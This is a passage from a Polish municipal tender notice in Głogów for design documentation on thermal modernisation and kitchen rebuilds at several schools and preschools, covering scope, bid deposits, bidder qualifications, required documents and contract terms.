Część V Modernizacja segmentu żywieniowego PP Nr 6 - dokumentacja
Wytyczne ogólnobudowlane:
Wykonanie inwentaryzacji wielobranżowej wraz z oceną stanu technicznego części kuchennej. Ocena stanu technicznego powinna zawierać przede wszystkim informacje odnoście elementów wyburzanych (konstrukcyjne, nie konstrukcyjne) i jak będzie to miało wpływ na pozostałą cześć budynku oraz ekspertyzę dachu jeżeli miała by być na nim posadowiona centrala wentylacyjna,  klimatyzatory lub inne urządzenia.
Wykonanie dokumentacji projektowej wielobranżowej łącznie z jej technologią remontu wraz                                 z przebudową kuchni z uwzględnieniem obowiązujących przepisów 
i nowoczesnego sprzętu oraz:
zakładanej ilości 125 obiadów dziennie, 
ilość pracowników na kuchni 4 osoby + 1 intendent
w kuchni należy zaprojektować okap kuchenny firmy Jeven
w pomieszczeniach należy zaprojektować wentylację mechaniczną z odzyskiem ciepła                                              z centralą z wymiennikiem krzyżowym, 
projekt nowych dźwigów windowych, lokalizacja w miejscu starych, dźwigi z drzwiami skrzydłowymi (wychylnymi) z możliwością wjazdu wózka kelnerskiego. 
komplet wyposażenia tzn wszystkie urządzenia, meble, drobne wyposażenie kuchni (np. garnki, patelnie, chochle itp.), kompletny serwis i sztućce
Zakres branży sanitarnej:
projekt branżowy instalacji rurowych kuchni i zaplecza (gaz, woda zimna, c.w.u., kan.san., kan. technologiczna, kan.deszcz., p.poż, centralne ogrzewanie, ciepło technologiczne dla central wentylacyjnych i klimatyzacyjnych) 
projekt branżowy wentylacji mechanicznej kuchni wraz z zapleczem
projekt branżowy automatyki wentylacji kuchni z zapleczem 
projekt branżowy instalacji alarmowej systemu detekcji gazu w kuchni 
projekt branżowy przyłącza kanalizacji sanitarnej oraz przyłącza kanalizacji technologicznej wraz                        z separatorem tłuszczu
projekt branżowy inwentaryzacji instalacji centralnego ogrzewania w całym obiekcie                                                    (w celu dokonania wyceny robót demontażowych)
Zakres branży elektrycznej:
zaprojektować nową rozdzielnicę zaplecza kuchennego ( RK )  wraz z przewodem zasilającym od rozdzielni głównej ( RG )  i przyłączeniem do głównej szyny uziemiającej ( GSU )  oraz instalacje elektryczne n n 0,4 kV 
z  projektowanej rozdzielnicy ( RK ) wyprowadzić obwody elektryczne do obsługi zaplecza kuchennego:
instalacje oświetleniowe
instalacje gniazd wtykowych  0,23 kV ( jednofazowe )
instalacje gniazd wtykowych 0,4 kV ( trójfazowe )
instalacje elektryczne zasilające wentylacje
instalacje oświetlenia ewakuacyjnego i awaryjnego
zasilanie sterowania  systemowego wentylacji   
Szczegółowy zakres projektanta określony jest w SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>powtórzenie tego samego rodzaju zamówień, zgodnie z przedmiotem zamówienia stanowiących nie więcej niż 50% wartości zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Część I. Termomodernizacja SP Nr 13 - świetlica - dokumentacja - 650,00 zł
                        Słownie: sześćset pięćdziesiąt złotych 00/100

     Część II. Termomodernizacja PP Nr 5 wraz z przebudową segmentu żywieniowego  - 2.500,00 zł 
                           Słownie: dwa tysiące pięćset złotych 00/100

    Część III Termomodernizacja GM  Nr 1 - dokumentacja - 1.200,00 zł
                        Słownie: jeden tysiąc dwieście złotych 00/100

    Część IV SP Nr 12 - przebudowa segmentu żywieniowego - 2.500,00 zł
                        Słownie: dwa tysiące pięćset złotych 00/100
    Część V Modernizacja segmentu żywieniowego PP Nr 6  - dokumentacja- 2.100,00 zł 
                        Słownie: dwa tysiące sto złotych 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą i udokumentują , iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali minimum 1 projekt budowlany i wykonawczy wraz z decyzją pozwolenia na budowę lub zgłoszeniem budynku użyteczności publicznej o kubaturze minimum 1500m3 w zakresie termomodernizacji objętego ochroną Konserwatora Zabytków - część I
wykażą i udokumentują , iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali minimum 1 projekt budowlany i wykonawczy wraz z decyzją pozwolenia na budowę lub zgłoszeniem budynku użyteczności publicznej o kubaturze minimum 2500m3                  w zakresie termomodernizacji, a także wykonali projekt wraz z uzyskaniem decyzji pozwolenia na budowę lub zgłoszenia, który obejmował przebudowę kuchni, stołówki lub segmentu kuchennego w budynku użyteczności publicznej o kubaturze minimum 2500 m3 - część II
wykażą i udokumentują , iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali minimum 1 projekt budowlany i wykonawczy wraz z decyzją pozwolenia na budowę lub zgłoszeniem  budynku użyteczności publicznej o kubaturze minimum 2500m3 w zakresie termomodernizacji objętego ochroną Konserwatora Zabytków - część III
wykażą i udokumentują , iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali minimum 1 projekt budowlany i wykonawczy wraz z decyzją pozwolenia na budowę lub zgłoszeniem budynku użyteczności publicznej o kubaturze minimum 2500m3 , który obejmował przebudowę kuchni, stołówki lub segmentu kuchennego-część IV
wykażą i udokumentują , iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali minimum 1 projekt budowlany i wykonawczy wraz z decyzją pozwolenia na budowę lub zgłoszeniem budynku użyteczności publicznej o kubaturze minimum 2500m3 , który obejmował przebudowę kuchni, stołówki lub segmentu kuchennego-część V
Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu usług i dowodów dot.najważniejszych usług potwierdzających, że usługi zostały wykonane w sposób należyty i prawidłowo ukończone na zasadzie spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie określa się minimalnych standardów. Spełnienie warunku zostanie ocenione na podstawie złożonego oświadczenia na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują osobami posiadającymi uprawnienia do projektowania w specjalnościach zgodnie z wykonywanym zakresem tj.
architektonicznej bez ograniczeń, 
konstrukcyjno-budowlanej bez ograniczeń, 
w zakresie  instalacyjnym w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych posiadającą uprawnienia do projektowania bez ograniczeń ,
w zakresie  instalacyjnym w zakresie sieci, instalacji i urządzeń elektrycznych                                                  i elektroenergetycznych posiadającą uprawnienia do projektowania bez ograniczeń,
b) kadra kierowania musi posiadać stwierdzenie przygotowania zawodowego do wykonywania samodzielnych funkcji w budownictwie (uprawnienia), wpis na listę właściwej Okręgowej Izby Samorządu Zawodowego;
UWAGA:
1. Uprawnienia , o których mowa wyżej powinny być zgodne z ustawą z dnia 7 lipca 1994r. Prawo budowlane ( tj. Dz. U. z 2013r. poz.1409) oraz Rozporządzeniem Ministra Transportu 
i Budownictwa z dnia 28 kwietnia 2006r. w sprawie samodzielnych funkcji technicznych w budownictwie ( Dz. U. z 2006r. nr 83 poz.578 ze zm.) lub ważne odpowiadające im kwalifikacje, nadane na podstawie wcześniej obowiązujących przepisów , upoważniające do projektowania w zakresie objętym niniejszym zamówieniem,
2. W przypadku wykonawców zagranicznych , dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach , na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane , z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej ( Dz. U. 2008r. nr 63, poz.394 ze zm.).
Ocena spełnienia warunku będzie dokonana na podstawie złożonego wykazu osób, które będą odpowiedzialne za realizację zamówienia oraz oświadczenia, że osoby te posiadają wymagane uprawnienia na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają opłacone  ubezpieczenie OC z tytułu prowadzonej działalności gospodarczej na sumę ubezpieczenia minimum 100.000,00 złotych. 
Ocena spełnienia warunku będzie dokonana na podstawie złożonego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od OC na wymaganą sumę ubezpieczenia, dowodu jego opłacenia na zasadzie spełnia- nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony  załącznik nr 1 - formularz  OFERTA.
2) Pełnomocnictwo podmiotów występujących wspólnie.
3) Pełnomocnictwo dla osoby podpisującej ofertę i oświadczenia - jeśli uprawnienie tej    
     osoby nie wynika z innych dokumentów dołączonych do oferty.
4) Kopia dowodu wniesienia wadium. 
5)Wykaz części zamówienia, które wykonawca zamierza zlecić do wykonania 
     podwykonawcom.
6) Zobowiązania innych podmiotów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - ilość pobytów na budowie - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>7.	Zmiany umowy:
7.1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną na piśmie pod rygorem nieważności.
7.2. Niedopuszczalna jest zmiana postanowień zawartej umowy oraz wprowadzanie                         do umowy postanowień niekorzystnych dla Zamawiającego.
7.3. Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w formie pisemnego aneksu na następujących warunkach :
1)	Wykonawca może dokonywać zmiany specjalistów, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego specjalistę.
2)	Jeżeli zmiana specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji itp.),
3)	Zamawiający może zażądać od wykonawcy zmiany specjalisty, jeżeli uzna, że   specjalista nie wykonuje swoich obowiązków wynikających z umowy. Wykonawca obowiązany jest zmienić  specjalistę zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego. W przypadku zmiany specjalisty  nowy specjalista musi spełniać wymagania określone dla danego specjalisty,
7.4. Zmiany w umowie będą mogły nastąpić w następujących przypadkach:
1)	zaistnienie okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi, warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie może ulec termin realizacji umowy, 
2)	gdy zaistnieje inna, niemożliwa do przewidzenia  w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy,
3)	wystąpienia przedłużającej się procedury badania i oceny ofert oraz procedury odwoławczej - zmianie może ulec termin realizacji zamówienia,
4)	konieczności wykonania ewentualnych zamówień dodatkowych, uzupełniających - Zamawiający dopuszcza możliwość zmiany umowy, w szczególności terminu realizacji zamówienia,
5)	ograniczenia zakresu, czego nie można było przewidzieć mimo dochowania należytej staranności - Zamawiający dopuszcza możliwość zmiany umowy, w tym terminu realizacji zamówienia,
7.5 Zmiana wysokości wynagrodzenia wykonawcy po okresie 12 m-cy realizacji umowy 
w przypadku zmiany:
1)stawki podatku od towarów i usług, 
2)wysokości minimalnego wynagrodzenia a pracę ustalonego na podst. art. 2 ust. 3-5 ustawy z dnia 10 października 2002r. o minimalnym wynagrodzeniu za pracę,
3)zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.
7.6. Zmiana podwykonawcy - na pisemny wniosek Wykonawcy, dopuszcza się zmianę podwykonawcy lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia. Zamiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy lub dalszego podwykonawcy o jego rezygnacji z udziału w realizacji przedmiotu zamówienia oraz o braku roszczeń wobec Wykonawcy z tytułu realizacji robót. Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania.
7.7. Zmiana umowy nastąpić może z inicjatywy Zamawiającego albo Wykonawcy poprzez przedstawienie drugiej stronie propozycji zmian w formie pisemnej, które powinny zawierać: 
1)	opis zmiany,
2)	uzasadnienie zmiany,
3)	koszt zmiany oraz jego wpływ na wysokość wynagrodzenia,
4)	czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.glogow.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Głogów, Rynek 10, 67-200 Głogów, piętro III, pok. nr 314..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2016 godzina 10:00, miejsce: Urząd Miejski Głogów, Rynek 10, 67-200 Głogów, piętro I, pok. nr 125..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I  Termomodernizacja SP Nr 13 - świetlica - dokumentacja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W ramach zadania należy:
Wykonać inwentaryzację wraz z oceną stanu technicznego całego budynku w branży architektoniczno- budowlanej. Wykonać odkrywki   ław fundamentowych i sprawdzić  czy budynek posiada izolację poziomą.
Wykonać audyt energetyczny oraz efektywności ekologicznej
Wykonać pomiary zawilgocenia i zasolenia ścian
Po wykonaniu oceny stanu technicznego oraz wyników pomiarów zawilgocenia i zasolenia ścian jak również uzgodnienia (wytyczne) z Wojewódzkim Konserwatorem Zabytków  przedstawić propozycję technologii wykonania termomodernizacji całego budynku inwestorowi do zaakceptowania.
Termomodernizacja ma uwzględniać wymianę całej stolarki okiennej i drzwiowej (nie wymienionej) oraz zagospodarowanie terenu wokół obiektu (dojścia i dojazdy do obiektu w zakresie niezbędnym przylegającym do termomodernizowanego obiektu. Nowa stolarka powinna być jednolita z wymienioną na najniższej kondygnacji.
Uwaga:
Obiekt jest w wykazie Wojewódzkiego Konserwatora Zabytków we Wrocławiu, delegatura w Legnicy, dlatego wszelkie rozwiązanie techniczne winy być uzgodnione z Wojewódzkim Konserwatorem Zabytków.
Wykonać dokumentację projektową wielobranżową łącznie z technologią remontu z uwzględnieniem obowiązujących przepisów.
Przed przystąpieniem do projektu zasadniczego po zapoznaniu się ze szczegółowymi oczekiwaniami inwestora i użytkownika przedstawić koncepcje rozwiązania do akceptacji i dopiero po uzgodnieniu przez Inwestora rozwiązania  należy przystąpić do wykonywania projektu zasadniczego.
Projekt wykonawczy powinien uwzględniać dokładny opis i rysunki szczegółowe dobranej technologii 
Branża elektryczna: zaprojektować nową instalację odgromową przystosowaną do obecnie obowiązujących przepisów  i norm - na budynku termomodernizowanym będącym pod nadzorem konserwatorskim. Charakterystyka robot elektrycznych:
wykonać pomiary kontrolne rezystancji uziemienia
dokonać ocenę stanu technicznego instalacji odgromowej
wymienić zwody pionowe ( min.fi 8)
zwody poziome doprowadzić do należytego stanu technicznego
wymienić zaciski kontrolne
po analizie wyników pomiarów rezystancji uziemienia  (ewentualnie) wymienić    
uziemienie otokowe lub zastosować sondy
zdemontować wszystkie oprawy zewnętrzne (między innymi oświetlenia ewakuacyjnego lub urządzenia teletechniczne np. kamery monitoringu, anteny odbiorcze, czujniki ruchu itp. zamontowane na ścianach zewnętrznych budynku
po wykonaniu termomodernizacji wszystkie urządzenia (nowe) zamontować ponownie - przystosowując je do obecnie obowiązujących przepisów i norm 
Regulacja instalacji centralnego ogrzewania- dostosowanie instalacji do nowych warunków pracy po dociepleniu obiektu.
Szczegółowy zakres projektanta określony jest w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. ilość pobytów na budowie - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II Termomodernizacja PP Nr 5 wraz z przebudową segmentu żywieniowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres do opracowania dot. Termomodernizacji
Branża budowlana (termomodernizacja)
inwentaryzacja wraz z oceną stanu technicznego obiektu pod kątem planowanych prac.
audyt energetyczny oraz efektywności ekologicznej
ocieplanie ścian zewnętrznych elewacji budynku, z uwagi na straty ciepła
 ocieplenie ścian zewnętrznych piwnic poniżej poziomu terenu, wraz z wykonanie izolacji   pionowej ścian
ocieplenie fundamentów ścian zewnętrznych budynku w części nie podpiwniczonej,  poniżej  poziomu terenu, wraz z wykonaniem izolacji pionowej
wymiana doświetlaczy przy oknach piwnic na systemowe- remont schodów zewnętrznych i podestów, łącznie z przebudową głównego  zespołu wejściowego do budynku
wymiana wszystkich obróbek blacharskich
wymiana rynien i rur spustowych wraz z rewizjami
wymiana daszków nad wejściami do budynku, na systemowe
wymiana części drzwi zewnętrznych
wymiana drewnianej stolarki okiennej i parapetów wewnętrznych
remont przebudowa tarasów zewnętrznych 
wymiana opasek przy budynku, wraz z przyległymi chodnikami i zagospodarowaniem terenu.
remont pomieszczeń na poziomie piwnic
wymiana całej instalacji centralnego ogrzewania na nową dostosowaną do nowych parametrów po dociepleniu
wymiana zewnętrznej instalacji kanalizacji deszczowej, uwzględniając dodatkowe  odpływy np. przed wejściem z zewnątrz na poziom piwnic
 remont kominów na dachu, wraz z czapami betonowymi
docieplenie stropodachu granulatem z wełny mineralnej
Branża sanitarna:
projekt branżowy inwentaryzacji instalacji sanitarnych w całym obiekcie  
projekt branżowy instalacji centralnego ogrzewania w całym obiekcie (należy przewidzieć obudowy dla grzejników)
projekt branżowy instalacji p.poż. i wod kan w całym obiekcie (za wyjątkiem sanitariatów   
wyremontowanych w ostatnich latach) - w projekcie kanalizacji sanitarnej należy uwzględnić kanalizacje sanitarna dla węzła cieplnego ze studzienką chłodząca ponieważ obecnie miejscem zrzutu dla wody grzewczej spuszczanej w razie potrzeby z instalacji  c.o. jest studnia chłonna, która tej wody nie zbiera bo podłoże jest gliniaste,
